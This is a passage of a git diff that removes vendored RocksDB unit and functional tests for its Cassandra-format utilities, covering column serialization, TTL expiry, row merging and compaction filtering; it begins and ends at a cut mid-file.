-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <cstring>
-#include <memory>
-#include "util/testharness.h"
-#include "utilities/cassandra/format.h"
-#include "utilities/cassandra/serialize.h"
-#include "utilities/cassandra/test_utils.h"
-
-using namespace rocksdb::cassandra;
-
-namespace rocksdb {
-namespace cassandra {
-
-TEST(ColumnTest, Column) {
-  char data[4] = {'d', 'a', 't', 'a'};
-  int8_t mask = 0;
-  int8_t index = 1;
-  int64_t timestamp = 1494022807044;
-  Column c = Column(mask, index, timestamp, sizeof(data), data);
-
-  EXPECT_EQ(c.Index(), index);
-  EXPECT_EQ(c.Timestamp(), timestamp);
-  EXPECT_EQ(c.Size(), 14 + sizeof(data));
-
-  // Verify the serialization.
-  std::string dest;
-  dest.reserve(c.Size() * 2);
-  c.Serialize(&dest);
-
-  EXPECT_EQ(dest.size(), c.Size());
-  std::size_t offset = 0;
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), mask);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), index);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int64_t>(dest.c_str(), offset), timestamp);
-  offset += sizeof(int64_t);
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), sizeof(data));
-  offset += sizeof(int32_t);
-  EXPECT_TRUE(std::memcmp(data, dest.c_str() + offset, sizeof(data)) == 0);
-
-  // Verify the deserialization.
-  std::string saved_dest = dest;
-  std::shared_ptr<Column> c1 = Column::Deserialize(saved_dest.c_str(), 0);
-  EXPECT_EQ(c1->Index(), index);
-  EXPECT_EQ(c1->Timestamp(), timestamp);
-  EXPECT_EQ(c1->Size(), 14 + sizeof(data));
-
-  c1->Serialize(&dest);
-  EXPECT_EQ(dest.size(), 2 * c.Size());
-  EXPECT_TRUE(
-    std::memcmp(dest.c_str(), dest.c_str() + c.Size(), c.Size()) == 0);
-
-  // Verify the ColumnBase::Deserialization.
-  saved_dest = dest;
-  std::shared_ptr<ColumnBase> c2 =
-      ColumnBase::Deserialize(saved_dest.c_str(), c.Size());
-  c2->Serialize(&dest);
-  EXPECT_EQ(dest.size(), 3 * c.Size());
-  EXPECT_TRUE(
-    std::memcmp(dest.c_str() + c.Size(), dest.c_str() + c.Size() * 2, c.Size())
-      == 0);
-}
-
-TEST(ExpiringColumnTest, ExpiringColumn) {
-  char data[4] = {'d', 'a', 't', 'a'};
-  int8_t mask = ColumnTypeMask::EXPIRATION_MASK;
-  int8_t index = 3;
-  int64_t timestamp = 1494022807044;
-  int32_t ttl = 3600;
-  ExpiringColumn c = ExpiringColumn(mask, index, timestamp,
-                                    sizeof(data), data, ttl);
-
-  EXPECT_EQ(c.Index(), index);
-  EXPECT_EQ(c.Timestamp(), timestamp);
-  EXPECT_EQ(c.Size(), 18 + sizeof(data));
-
-  // Verify the serialization.
-  std::string dest;
-  dest.reserve(c.Size() * 2);
-  c.Serialize(&dest);
-
-  EXPECT_EQ(dest.size(), c.Size());
-  std::size_t offset = 0;
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), mask);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), index);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int64_t>(dest.c_str(), offset), timestamp);
-  offset += sizeof(int64_t);
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), sizeof(data));
-  offset += sizeof(int32_t);
-  EXPECT_TRUE(std::memcmp(data, dest.c_str() + offset, sizeof(data)) == 0);
-  offset += sizeof(data);
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), ttl);
-
-  // Verify the deserialization.
-  std::string saved_dest = dest;
-  std::shared_ptr<ExpiringColumn> c1 =
-      ExpiringColumn::Deserialize(saved_dest.c_str(), 0);
-  EXPECT_EQ(c1->Index(), index);
-  EXPECT_EQ(c1->Timestamp(), timestamp);
-  EXPECT_EQ(c1->Size(), 18 + sizeof(data));
-
-  c1->Serialize(&dest);
-  EXPECT_EQ(dest.size(), 2 * c.Size());
-  EXPECT_TRUE(
-    std::memcmp(dest.c_str(), dest.c_str() + c.Size(), c.Size()) == 0);
-
-  // Verify the ColumnBase::Deserialization.
-  saved_dest = dest;
-  std::shared_ptr<ColumnBase> c2 =
-      ColumnBase::Deserialize(saved_dest.c_str(), c.Size());
-  c2->Serialize(&dest);
-  EXPECT_EQ(dest.size(), 3 * c.Size());
-  EXPECT_TRUE(
-    std::memcmp(dest.c_str() + c.Size(), dest.c_str() + c.Size() * 2, c.Size())
-      == 0);
-}
-
-TEST(TombstoneTest, Tombstone) {
-  int8_t mask = ColumnTypeMask::DELETION_MASK;
-  int8_t index = 2;
-  int32_t local_deletion_time = 1494022807;
-  int64_t marked_for_delete_at = 1494022807044;
-  Tombstone c = Tombstone(mask, index, local_deletion_time,
-                          marked_for_delete_at);
-
-  EXPECT_EQ(c.Index(), index);
-  EXPECT_EQ(c.Timestamp(), marked_for_delete_at);
-  EXPECT_EQ(c.Size(), 14);
-
-  // Verify the serialization.
-  std::string dest;
-  dest.reserve(c.Size() * 2);
-  c.Serialize(&dest);
-
-  EXPECT_EQ(dest.size(), c.Size());
-  std::size_t offset = 0;
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), mask);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), index);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), local_deletion_time);
-  offset += sizeof(int32_t);
-  EXPECT_EQ(Deserialize<int64_t>(dest.c_str(), offset), marked_for_delete_at);
-
-  // Verify the deserialization.
-  std::shared_ptr<Tombstone> c1 = Tombstone::Deserialize(dest.c_str(), 0);
-  EXPECT_EQ(c1->Index(), index);
-  EXPECT_EQ(c1->Timestamp(), marked_for_delete_at);
-  EXPECT_EQ(c1->Size(), 14);
-
-  c1->Serialize(&dest);
-  EXPECT_EQ(dest.size(), 2 * c.Size());
-  EXPECT_TRUE(
-    std::memcmp(dest.c_str(), dest.c_str() + c.Size(), c.Size()) == 0);
-
-  // Verify the ColumnBase::Deserialization.
-  std::shared_ptr<ColumnBase> c2 =
-    ColumnBase::Deserialize(dest.c_str(), c.Size());
-  c2->Serialize(&dest);
-  EXPECT_EQ(dest.size(), 3 * c.Size());
-  EXPECT_TRUE(
-    std::memcmp(dest.c_str() + c.Size(), dest.c_str() + c.Size() * 2, c.Size())
-      == 0);
-}
-
-TEST(RowValueTest, RowTombstone) {
-  int32_t local_deletion_time = 1494022807;
-  int64_t marked_for_delete_at = 1494022807044;
-  RowValue r = RowValue(local_deletion_time, marked_for_delete_at);
-
-  EXPECT_EQ(r.Size(), 12);
-  EXPECT_EQ(r.IsTombstone(), true);
-  EXPECT_EQ(r.LastModifiedTime(), marked_for_delete_at);
-
-  // Verify the serialization.
-  std::string dest;
-  dest.reserve(r.Size() * 2);
-  r.Serialize(&dest);
-
-  EXPECT_EQ(dest.size(), r.Size());
-  std::size_t offset = 0;
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), local_deletion_time);
-  offset += sizeof(int32_t);
-  EXPECT_EQ(Deserialize<int64_t>(dest.c_str(), offset), marked_for_delete_at);
-
-  // Verify the deserialization.
-  RowValue r1 = RowValue::Deserialize(dest.c_str(), r.Size());
-  EXPECT_EQ(r1.Size(), 12);
-  EXPECT_EQ(r1.IsTombstone(), true);
-  EXPECT_EQ(r1.LastModifiedTime(), marked_for_delete_at);
-
-  r1.Serialize(&dest);
-  EXPECT_EQ(dest.size(), 2 * r.Size());
-  EXPECT_TRUE(
-    std::memcmp(dest.c_str(), dest.c_str() + r.Size(), r.Size()) == 0);
-}
-
-TEST(RowValueTest, RowWithColumns) {
-  std::vector<std::shared_ptr<ColumnBase>> columns;
-  int64_t last_modified_time = 1494022807048;
-  std::size_t columns_data_size = 0;
-
-  char e_data[5] = {'e', 'd', 'a', 't', 'a'};
-  int8_t e_index = 0;
-  int64_t e_timestamp = 1494022807044;
-  int32_t e_ttl = 3600;
-  columns.push_back(std::shared_ptr<ExpiringColumn>(
-    new ExpiringColumn(ColumnTypeMask::EXPIRATION_MASK, e_index,
-      e_timestamp, sizeof(e_data), e_data, e_ttl)));
-  columns_data_size += columns[0]->Size();
-
-  char c_data[4] = {'d', 'a', 't', 'a'};
-  int8_t c_index = 1;
-  int64_t c_timestamp = 1494022807048;
-  columns.push_back(std::shared_ptr<Column>(
-    new Column(0, c_index, c_timestamp, sizeof(c_data), c_data)));
-  columns_data_size += columns[1]->Size();
-
-  int8_t t_index = 2;
-  int32_t t_local_deletion_time = 1494022801;
-  int64_t t_marked_for_delete_at = 1494022807043;
-  columns.push_back(std::shared_ptr<Tombstone>(
-    new Tombstone(ColumnTypeMask::DELETION_MASK,
-      t_index, t_local_deletion_time, t_marked_for_delete_at)));
-  columns_data_size += columns[2]->Size();
-
-  RowValue r = RowValue(std::move(columns), last_modified_time);
-
-  EXPECT_EQ(r.Size(), columns_data_size + 12);
-  EXPECT_EQ(r.IsTombstone(), false);
-  EXPECT_EQ(r.LastModifiedTime(), last_modified_time);
-
-  // Verify the serialization.
-  std::string dest;
-  dest.reserve(r.Size() * 2);
-  r.Serialize(&dest);
-
-  EXPECT_EQ(dest.size(), r.Size());
-  std::size_t offset = 0;
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset),
-    std::numeric_limits<int32_t>::max());
-  offset += sizeof(int32_t);
-  EXPECT_EQ(Deserialize<int64_t>(dest.c_str(), offset),
-    std::numeric_limits<int64_t>::min());
-  offset += sizeof(int64_t);
-
-  // Column0: ExpiringColumn
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset),
-    ColumnTypeMask::EXPIRATION_MASK);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), e_index);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int64_t>(dest.c_str(), offset), e_timestamp);
-  offset += sizeof(int64_t);
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), sizeof(e_data));
-  offset += sizeof(int32_t);
-  EXPECT_TRUE(std::memcmp(e_data, dest.c_str() + offset, sizeof(e_data)) == 0);
-  offset += sizeof(e_data);
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), e_ttl);
-  offset += sizeof(int32_t);
-
-  // Column1: Column
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), 0);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), c_index);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int64_t>(dest.c_str(), offset), c_timestamp);
-  offset += sizeof(int64_t);
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), sizeof(c_data));
-  offset += sizeof(int32_t);
-  EXPECT_TRUE(std::memcmp(c_data, dest.c_str() + offset, sizeof(c_data)) == 0);
-  offset += sizeof(c_data);
-
-  // Column2: Tombstone
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset),
-    ColumnTypeMask::DELETION_MASK);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), t_index);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), t_local_deletion_time);
-  offset += sizeof(int32_t);
-  EXPECT_EQ(Deserialize<int64_t>(dest.c_str(), offset), t_marked_for_delete_at);
-
-  // Verify the deserialization.
-  RowValue r1 = RowValue::Deserialize(dest.c_str(), r.Size());
-  EXPECT_EQ(r1.Size(), columns_data_size + 12);
-  EXPECT_EQ(r1.IsTombstone(), false);
-  EXPECT_EQ(r1.LastModifiedTime(), last_modified_time);
-
-  r1.Serialize(&dest);
-  EXPECT_EQ(dest.size(), 2 * r.Size());
-  EXPECT_TRUE(
-    std::memcmp(dest.c_str(), dest.c_str() + r.Size(), r.Size()) == 0);
-}
-
-TEST(RowValueTest, PurgeTtlShouldRemvoeAllColumnsExpired) {
-  int64_t now = time(nullptr);
-
-  auto row_value = CreateTestRowValue({
-    std::make_tuple(kColumn, 0, ToMicroSeconds(now)),
-    std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now - kTtl - 10)), //expired
-    std::make_tuple(kExpiringColumn, 2, ToMicroSeconds(now)), // not expired
-    std::make_tuple(kTombstone, 3, ToMicroSeconds(now))
-  });
-
-  bool changed = false;
-  auto purged = row_value.PurgeTtl(&changed);
-  EXPECT_TRUE(changed);
-  EXPECT_EQ(purged.columns_.size(), 3);
-  VerifyRowValueColumns(purged.columns_, 0, kColumn, 0, ToMicroSeconds(now));
-  VerifyRowValueColumns(purged.columns_, 1, kExpiringColumn, 2, ToMicroSeconds(now));
-  VerifyRowValueColumns(purged.columns_, 2, kTombstone, 3, ToMicroSeconds(now));
-
-  purged.PurgeTtl(&changed);
-  EXPECT_FALSE(changed);
-}
-
-TEST(RowValueTest, ExpireTtlShouldConvertExpiredColumnsToTombstones) {
-  int64_t now = time(nullptr);
-
-  auto row_value = CreateTestRowValue({
-    std::make_tuple(kColumn, 0, ToMicroSeconds(now)),
-    std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now - kTtl - 10)), //expired
-    std::make_tuple(kExpiringColumn, 2, ToMicroSeconds(now)), // not expired
-    std::make_tuple(kTombstone, 3, ToMicroSeconds(now))
-  });
-
-  bool changed = false;
-  auto compacted = row_value.ExpireTtl(&changed);
-  EXPECT_TRUE(changed);
-  EXPECT_EQ(compacted.columns_.size(), 4);
-  VerifyRowValueColumns(compacted.columns_, 0, kColumn, 0, ToMicroSeconds(now));
-  VerifyRowValueColumns(compacted.columns_, 1, kTombstone, 1, ToMicroSeconds(now - 10));
-  VerifyRowValueColumns(compacted.columns_, 2, kExpiringColumn, 2, ToMicroSeconds(now));
-  VerifyRowValueColumns(compacted.columns_, 3, kTombstone, 3, ToMicroSeconds(now));
-
-  compacted.ExpireTtl(&changed);
-  EXPECT_FALSE(changed);
-}
-} // namespace cassandra
-} // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/utilities/cassandra/cassandra_functional_test.cc b/thirdparty/rocksdb/utilities/cassandra/cassandra_functional_test.cc
deleted file mode 100644
index 0c02228..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/cassandra_functional_test.cc
+++ /dev/null
@@ -1,251 +0,0 @@
-// Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <iostream>
-#include "rocksdb/db.h"
-#include "db/db_impl.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "util/testharness.h"
-#include "util/random.h"
-#include "utilities/merge_operators.h"
-#include "utilities/cassandra/cassandra_compaction_filter.h"
-#include "utilities/cassandra/merge_operator.h"
-#include "utilities/cassandra/test_utils.h"
-
-using namespace rocksdb;
-
-namespace rocksdb {
-namespace cassandra {
-
-// Path to the database on file system
-const std::string kDbName = test::TmpDir() + "/cassandra_functional_test";
-
-class CassandraStore {
- public:
-  explicit CassandraStore(std::shared_ptr<DB> db)
-      : db_(db),
-        merge_option_(),
-        get_option_() {
-    assert(db);
-  }
-
-  bool Append(const std::string& key, const RowValue& val){
-    std::string result;
-    val.Serialize(&result);
-    Slice valSlice(result.data(), result.size());
-    auto s = db_->Merge(merge_option_, key, valSlice);
-
-    if (s.ok()) {
-      return true;
-    } else {
-      std::cerr << "ERROR " << s.ToString() << std::endl;
-      return false;
-    }
-  }
-
-  void Flush() {
-    dbfull()->TEST_FlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-
-  void Compact() {
-    dbfull()->TEST_CompactRange(
-      0, nullptr, nullptr, db_->DefaultColumnFamily());
-  }
-
-  std::tuple<bool, RowValue> Get(const std::string& key){
-    std::string result;
-    auto s = db_->Get(get_option_, key, &result);
-
-    if (s.ok()) {
-      return std::make_tuple(true,
-                             RowValue::Deserialize(result.data(),
-                                                   result.size()));
-    }
-
-    if (!s.IsNotFound()) {
-      std::cerr << "ERROR " << s.ToString() << std::endl;
-    }
-
-    return std::make_tuple(false, RowValue(0, 0));
-  }
-
- private:
-  std::shared_ptr<DB> db_;
-  WriteOptions merge_option_;
-  ReadOptions get_option_;
-
-  DBImpl* dbfull() { return reinterpret_cast<DBImpl*>(db_.get()); }
-
-};
-
-class TestCompactionFilterFactory : public CompactionFilterFactory {
-public:
-  explicit TestCompactionFilterFactory(bool purge_ttl_on_expiration)
-    : purge_ttl_on_expiration_(purge_ttl_on_expiration) {}
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    return unique_ptr<CompactionFilter>(new CassandraCompactionFilter(purge_ttl_on_expiration_));
-  }
-
-  virtual const char* Name() const override {
-    return "TestCompactionFilterFactory";
-  }
-
-private:
-  bool purge_ttl_on_expiration_;
-};
-
-
-// The class for unit-testing
-class CassandraFunctionalTest : public testing::Test {
-public:
-  CassandraFunctionalTest() {
-    DestroyDB(kDbName, Options());    // Start each test with a fresh DB
-  }
-
-  std::shared_ptr<DB> OpenDb() {
-    DB* db;
-    Options options;
-    options.create_if_missing = true;
-    options.merge_operator.reset(new CassandraValueMergeOperator());
-    auto* cf_factory = new TestCompactionFilterFactory(purge_ttl_on_expiration_);
-    options.compaction_filter_factory.reset(cf_factory);
-    EXPECT_OK(DB::Open(options, kDbName, &db));
-    return std::shared_ptr<DB>(db);
-  }
-
-  bool purge_ttl_on_expiration_ = false;
-};
-
-// THE TEST CASES BEGIN HERE
-
-TEST_F(CassandraFunctionalTest, SimpleMergeTest) {
-  CassandraStore store(OpenDb());
-
-  store.Append("k1", CreateTestRowValue({
-    std::make_tuple(kTombstone, 0, 5),
-    std::make_tuple(kColumn, 1, 8),
-    std::make_tuple(kExpiringColumn, 2, 5),
-  }));
-  store.Append("k1",CreateTestRowValue({
-    std::make_tuple(kColumn, 0, 2),
-    std::make_tuple(kExpiringColumn, 1, 5),
-    std::make_tuple(kTombstone, 2, 7),
-    std::make_tuple(kExpiringColumn, 7, 17),
-  }));
-  store.Append("k1", CreateTestRowValue({
-    std::make_tuple(kExpiringColumn, 0, 6),
-    std::make_tuple(kTombstone, 1, 5),
-    std::make_tuple(kColumn, 2, 4),
-    std::make_tuple(kTombstone, 11, 11),
-  }));
-
-  auto ret = store.Get("k1");
-
-  ASSERT_TRUE(std::get<0>(ret));
-  RowValue& merged = std::get<1>(ret);
-  EXPECT_EQ(merged.columns_.size(), 5);
-  VerifyRowValueColumns(merged.columns_, 0, kExpiringColumn, 0, 6);
-  VerifyRowValueColumns(merged.columns_, 1, kColumn, 1, 8);
-  VerifyRowValueColumns(merged.columns_, 2, kTombstone, 2, 7);
-  VerifyRowValueColumns(merged.columns_, 3, kExpiringColumn, 7, 17);
-  VerifyRowValueColumns(merged.columns_, 4, kTombstone, 11, 11);
-}
-
-TEST_F(CassandraFunctionalTest,
-       CompactionShouldConvertExpiredColumnsToTombstone) {
-  CassandraStore store(OpenDb());
-  int64_t now= time(nullptr);
-
-  store.Append("k1", CreateTestRowValue({
-    std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 20)), //expired
-    std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now - kTtl + 10)), // not expired
-    std::make_tuple(kTombstone, 3, ToMicroSeconds(now))
-  }));
-
-  store.Flush();
-
-  store.Append("k1",CreateTestRowValue({
-    std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 10)), //expired
-    std::make_tuple(kColumn, 2, ToMicroSeconds(now))
-  }));
-
-  store.Flush();
-  store.Compact();
-
-  auto ret = store.Get("k1");
-  ASSERT_TRUE(std::get<0>(ret));
-  RowValue& merged = std::get<1>(ret);
-  EXPECT_EQ(merged.columns_.size(), 4);
-  VerifyRowValueColumns(merged.columns_, 0, kTombstone, 0, ToMicroSeconds(now - 10));
-  VerifyRowValueColumns(merged.columns_, 1, kExpiringColumn, 1, ToMicroSeconds(now - kTtl + 10));
-  VerifyRowValueColumns(merged.columns_, 2, kColumn, 2, ToMicroSeconds(now));
-  VerifyRowValueColumns(merged.columns_, 3, kTombstone, 3, ToMicroSeconds(now));
-}
-
-
-TEST_F(CassandraFunctionalTest,
-       CompactionShouldPurgeExpiredColumnsIfPurgeTtlIsOn) {
-  purge_ttl_on_expiration_ = true;
-  CassandraStore store(OpenDb());
-  int64_t now = time(nullptr);
-
-  store.Append("k1", CreateTestRowValue({
-    std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 20)), //expired
-    std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now)), // not expired
-    std::make_tuple(kTombstone, 3, ToMicroSeconds(now))
-  }));
-
-  store.Flush();
-
-  store.Append("k1",CreateTestRowValue({
-    std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 10)), //expired
-    std::make_tuple(kColumn, 2, ToMicroSeconds(now))
-  }));
-
-  store.Flush();
-  store.Compact();
-
-  auto ret = store.Get("k1");
-  ASSERT_TRUE(std::get<0>(ret));
-  RowValue& merged = std::get<1>(ret);
-  EXPECT_EQ(merged.columns_.size(), 3);
-  VerifyRowValueColumns(merged.columns_, 0, kExpiringColumn, 1, ToMicroSeconds(now));
-  VerifyRowValueColumns(merged.columns_, 1, kColumn, 2, ToMicroSeconds(now));
-  VerifyRowValueColumns(merged.columns_, 2, kTombstone, 3, ToMicroSeconds(now));
-}
-
-TEST_F(CassandraFunctionalTest,
-       CompactionShouldRemoveRowWhenAllColumnsExpiredIfPurgeTtlIsOn) {
-  purge_ttl_on_expiration_ = true;
-  CassandraStore store(OpenDb());
-  int64_t now = time(nullptr);
-
-  store.Append("k1", CreateTestRowValue({
-    std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 20)),
-    std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now - kTtl - 20)),
-  }));
-
-  store.Flush();
-
-  store.Append("k1",CreateTestRowValue({
-    std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 10)),
-  }));
-
-  store.Flush();
-  store.Compact();
-  ASSERT_FALSE(std::get<0>(store.Get("k1")));
-}
-
-} // namespace cassandra
-} // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/utilities/cassandra/cassandra_row_merge_test.cc b/thirdparty/rocksdb/utilities/cassandra/cassandra_row_merge_test.cc
deleted file mode 100644
index 78c7d8e..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/cassandra_row_merge_test.cc
+++ /dev/null
@@ -1,112 +0,0 @@
-// Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <memory>
-#include "util/testharness.h"
-#include "utilities/cassandra/format.h"
-#include "utilities/cassandra/test_utils.h"
-
-namespace rocksdb {
-namespace cassandra {
-
-TEST(RowValueMergeTest, Merge) {
-  std::vector<RowValue> row_values;
-  row_values.push_back(
-    CreateTestRowValue({
-      std::make_tuple(kTombstone, 0, 5),
-      std::make_tuple(kColumn, 1, 8),
-      std::make_tuple(kExpiringColumn, 2, 5),
-    })
-  );
-
-  row_values.push_back(
-    CreateTestRowValue({
-      std::make_tuple(kColumn, 0, 2),
-      std::make_tuple(kExpiringColumn, 1, 5),
-      std::make_tuple(kTombstone, 2, 7),
-      std::make_tuple(kExpiringColumn, 7, 17),
-    })
-  );
-
-  row_values.push_back(
-    CreateTestRowValue({
-      std::make_tuple(kExpiringColumn, 0, 6),
-      std::make_tuple(kTombstone, 1, 5),
-      std::make_tuple(kColumn, 2, 4),
-      std::make_tuple(kTombstone, 11, 11),
-    })
-  );
-
-  RowValue merged = RowValue::Merge(std::move(row_values));
-  EXPECT_FALSE(merged.IsTombstone());
-  EXPECT_EQ(merged.columns_.size(), 5);
-  VerifyRowValueColumns(merged.columns_, 0, kExpiringColumn, 0, 6);
-  VerifyRowValueColumns(merged.columns_, 1, kColumn, 1, 8);
-  VerifyRowValueColumns(merged.columns_, 2, kTombstone, 2, 7);
-  VerifyRowValueColumns(merged.columns_, 3, kExpiringColumn, 7, 17);
-  VerifyRowValueColumns(merged.columns_, 4, kTombstone, 11, 11);
-}
-
-TEST(RowValueMergeTest, MergeWithRowTombstone) {
-  std::vector<RowValue> row_values;
-
-  // A row tombstone.
-  row_values.push_back(
-    CreateRowTombstone(11)
-  );
-
-  // This row's timestamp is smaller than tombstone.
-  row_values.push_back(
-    CreateTestRowValue({
-      std::make_tuple(kColumn, 0, 5),
-      std::make_tuple(kColumn, 1, 6),
-    })
-  );
-
-  // Some of the column's row is smaller, some is larger.
-  row_values.push_back(
-    CreateTestRowValue({
-      std::make_tuple(kColumn, 2, 10),
-      std::make_tuple(kColumn, 3, 12),
-    })
-  );
-
-  // All of the column's rows are larger than tombstone.
-  row_values.push_back(
-    CreateTestRowValue({
-      std::make_tuple(kColumn, 4, 13),
-      std::make_tuple(kColumn, 5, 14),
-    })
-  );
-
-  RowValue merged = RowValue::Merge(std::move(row_values));
-  EXPECT_FALSE(merged.IsTombstone());
-  EXPECT_EQ(merged.columns_.size(), 3);
-  VerifyRowValueColumns(merged.columns_, 0, kColumn, 3, 12);
-  VerifyRowValueColumns(merged.columns_, 1, kColumn, 4, 13);
-  VerifyRowValueColumns(merged.columns_, 2, kColumn, 5, 14);
-
-  // If the tombstone's timestamp is the latest, then it returns a
-  // row tombstone.
-  row_values.push_back(
-    CreateRowTombstone(15)
-  );
-
-  row_values.push_back(
-    CreateRowTombstone(17)
-  );
-
-  merged = RowValue::Merge(std::move(row_values));
-  EXPECT_TRUE(merged.IsTombstone());
-  EXPECT_EQ(merged.LastModifiedTime(), 17);
-}
-
-} // namespace cassandra
-} // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/utilities/cassandra/cassandra_serialize_test.cc b/thirdparty/rocksdb/utilities/cassandra/cassandra_serialize_test.cc
deleted file mode 100644
index 68d2c16..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/cassandra_serialize_test.cc
+++ /dev/null
@@ -1,188 +0,0 @@
-// Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "util/testharness.h"
-#include "utilities/cassandra/serialize.h"
-
-using namespace rocksdb::cassandra;
-
-namespace rocksdb {
-namespace cassandra {
-
-TEST(SerializeTest, SerializeI64) {
-  std::string dest;
-  Serialize<int64_t>(0, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\x00', '\x00', '\x00', '\x00', '\x00', '\x00', '\x00', '\x00'}),
-      dest);
-
-  dest.clear();
-  Serialize<int64_t>(1, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\x00', '\x00', '\x00', '\x00', '\x00', '\x00', '\x00', '\x01'}),
-      dest);
-
-
-  dest.clear();
-  Serialize<int64_t>(-1, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\xff', '\xff', '\xff', '\xff', '\xff', '\xff', '\xff', '\xff'}),
-      dest);
-
-  dest.clear();
-  Serialize<int64_t>(9223372036854775807, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\x7f', '\xff', '\xff', '\xff', '\xff', '\xff', '\xff', '\xff'}),
-      dest);
-
-  dest.clear();
-  Serialize<int64_t>(-9223372036854775807, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\x80', '\x00', '\x00', '\x00', '\x00', '\x00', '\x00', '\x01'}),
-      dest);
-}
-
-TEST(SerializeTest, DeserializeI64) {
-  std::string dest;
-  std::size_t offset = dest.size();
-  Serialize<int64_t>(0, &dest);
-  EXPECT_EQ(0, Deserialize<int64_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int64_t>(1, &dest);
-  EXPECT_EQ(1, Deserialize<int64_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int64_t>(-1, &dest);
-  EXPECT_EQ(-1, Deserialize<int64_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int64_t>(-9223372036854775807, &dest);
-  EXPECT_EQ(-9223372036854775807, Deserialize<int64_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int64_t>(9223372036854775807, &dest);
-  EXPECT_EQ(9223372036854775807, Deserialize<int64_t>(dest.c_str(), offset));
-}
-
-TEST(SerializeTest, SerializeI32) {
-  std::string dest;
-  Serialize<int32_t>(0, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\x00', '\x00', '\x00', '\x00'}),
-      dest);
-
-  dest.clear();
-  Serialize<int32_t>(1, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\x00', '\x00', '\x00', '\x01'}),
-      dest);
-
-
-  dest.clear();
-  Serialize<int32_t>(-1, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\xff', '\xff', '\xff', '\xff'}),
-      dest);
-
-  dest.clear();
